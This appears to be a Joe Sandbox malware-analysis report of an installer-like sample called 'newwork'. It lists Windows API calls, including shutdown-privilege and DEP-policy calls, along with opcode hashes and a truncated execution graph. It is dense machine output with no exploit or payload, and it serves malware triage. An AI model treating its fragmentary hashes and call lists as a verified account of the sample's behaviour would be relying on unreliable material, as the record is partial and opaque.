                                                                                • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$FilePointer
                                                                                • String ID:
                                                                                • API String ID: 1156039329-0
                                                                                • Opcode ID: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                • Instruction ID: 74cf86129294d2faf5969c20f66175129728110ffa3c668ef2bae8a95e28f18b
                                                                                • Opcode Fuzzy Hash: 7730a1f6a5d1c383143cef2e1ec1cb69b5af0836910a757b2920ce96cbe13b7f
                                                                                • Instruction Fuzzy Hash: C4E04FB1600210AFDB10EEB98D81B9676D89F48364F0485B6EA14DF2C6D274DC00C766
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401739), ref: 0040145F
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401739), ref: 00401486
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 2087232378-0
                                                                                • Opcode ID: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                • Instruction ID: 29306f1da17679ce7d7d3cecb65679b0075e6f6f2ddca0a826851c871ac90975
                                                                                • Opcode Fuzzy Hash: 2e9c029c9a25ba07e21da294550151284eb3fb058128c9ffe8d20eb9f4f906d3
                                                                                • Instruction Fuzzy Hash: 57F02772B0032057DB206A6A0CC1B636AC59F85B90F1541BBFA4CFF3F9D2B98C0042A9
                                                                                APIs
                                                                                • GetSystemDefaultLCID.KERNEL32(00000000,004053B6), ref: 0040529F
                                                                                  • Part of subcall function 00404CDC: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00404CF9
                                                                                  • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                Similarity
                                                                                • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                • String ID:
                                                                                • API String ID: 1658689577-0
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004075B8
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID:
                                                                                • API String ID: 442123175-0
                                                                                APIs
                                                                                • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                                Similarity
                                                                                • API ID: FormatMessage
                                                                                • String ID:
                                                                                • API String ID: 1306739567-0
                                                                                APIs
                                                                                • SetEndOfFile.KERNEL32(?,020E8000,0040AA59,00000000), ref: 004076B3
                                                                                  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,020D03AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                Similarity
                                                                                • API ID: ErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 734332943-0
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                APIs
                                                                                • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                Similarity
                                                                                • API ID: CharPrev
                                                                                • String ID:
                                                                                • API String ID: 122130370-0
                                                                                APIs
                                                                                • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                                Similarity
                                                                                • API ID: FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 1263568516-0
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                                Similarity
                                                                                • API ID: FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 1263568516-0
                                                                                • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                                • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 0040949D
                                                                                • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000,00000000,SeShutdownPrivilege), ref: 004094A2
                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                • String ID: SeShutdownPrivilege
                                                                                • API String ID: 107509674-3733053543
                                                                                • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                APIs
                                                                                • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                Similarity
                                                                                • API ID: InfoLocale
                                                                                • String ID:
                                                                                • API String ID: 2299586839-0
                                                                                • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                                • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                                APIs
                                                                                • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                Similarity
                                                                                • API ID: SystemTime
                                                                                • String ID:
                                                                                • API String ID: 2656138-0
                                                                                • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                APIs
                                                                                • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                                                Similarity
                                                                                • API ID: Version
                                                                                • String ID:
                                                                                • API String ID: 1889659487-0
                                                                                • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                                • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: AddressCloseHandleModuleProc
                                                                                • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                • API String ID: 4190037839-2401316094
                                                                                • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                Similarity
                                                                                • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                • String ID:
                                                                                • API String ID: 1694776339-0
                                                                                • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                APIs
                                                                                • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                  • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                  • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: InfoLocale$DefaultSystem
                                                                                • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                • API String ID: 1044490935-665933166
                                                                                • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                • LocalFree.KERNEL32(0050A320,00000000,00401AB4), ref: 00401A1B
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000,0050A320,00000000,00401AB4), ref: 00401A3A
                                                                                • LocalFree.KERNEL32(0050B320,?,00000000,00008000,0050A320,00000000,00401AB4), ref: 00401A79
                                                                                • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                Similarity
                                                                                • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                • String ID:
                                                                                • API String ID: 3782394904-0
                                                                                • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ExitMessageProcess
                                                                                • String ID: Error$Runtime error at 00000000$9@
                                                                                • API String ID: 1220098344-1503883590
                                                                                • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$AllocString
                                                                                • String ID:
                                                                                • API String ID: 262959230-0
                                                                                • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CommandHandleLineModule
                                                                                • String ID: U1hd.@$X%O
                                                                                • API String ID: 2123368496-3163241700
                                                                                • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: QueryValue
                                                                                • String ID: )q@
                                                                                • API String ID: 3660427363-2284170586
                                                                                • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                APIs
                                                                                • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                Strings
                                                                                • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                • Setup, xrefs: 00409CAD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Message
                                                                                • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                • API String ID: 2030045667-3271211647
                                                                                • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                APIs
                                                                                • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2567426632.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2567386416.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567835108.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2567893233.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 1458359878-0
                                                                                • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                Execution Graph

                                                                                Execution Coverage:16.1%
                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                Signature Coverage:4.6%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:62
                                                                                execution_graph 49369 40cd00 49370 40cd12 49369->49370 49371 40cd0d 49369->49371 49373 406f48 CloseHandle 49371->49373 49373->49370 49374 498ba8 49432 403344 49374->49432 49376 498bb6 49435 4056a0 49376->49435 49378 498bbb 49438 40631c GetModuleHandleA GetProcAddress 49378->49438 49382 498bc5 49446 40994c 49382->49446 49713 4032fc 49432->49713 49434 403349 GetModuleHandleA GetCommandLineA 49434->49376 49437 4056db 49435->49437 49714 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 49435->49714 49437->49378 49439 406338 49438->49439 49440 40633f GetProcAddress 49438->49440 49439->49440 49441 406355 GetProcAddress 49440->49441 49442 40634e 49440->49442 49443 406364 SetProcessDEPPolicy 49441->49443 49444 406368 49441->49444 49442->49441 49443->49444 49445 4063c4 6FCB1CD0 49444->49445 49445->49382 49715 409024 49446->49715 49713->49434 49714->49437 49787 408cbc 49715->49787 49718 4085dc GetSystemDefaultLCID 49722 408612 49718->49722 49719 406dec 19 API calls 49719->49722 49720 408568 19 API calls 49720->49722 49721 403450 18 API calls 49721->49722 49722->49719 49722->49720 49722->49721 49726 408674 49722->49726 49723 406dec 19 API calls 49723->49726 49724 408568 19 API calls 49724->49726 49725 403450 18 API calls 49725->49726 49726->49723 49726->49724 49726->49725 49727 4086f7 49726->49727 49863 403420 49727->49863 49730 408720 GetSystemDefaultLCID 49867 408568 GetLocaleInfoA 49730->49867 49733 403450 18 API calls 49734 408760 49733->49734 49735 408568 19 API calls 49734->49735 49736 408775 49735->49736 49737 408568 19 API calls 49736->49737 49738 408799 49737->49738 49873 4085b4 GetLocaleInfoA 49738->49873 49741 4085b4 GetLocaleInfoA 49742 4087c9 49741->49742 49743 408568 19 API calls 49742->49743 49744 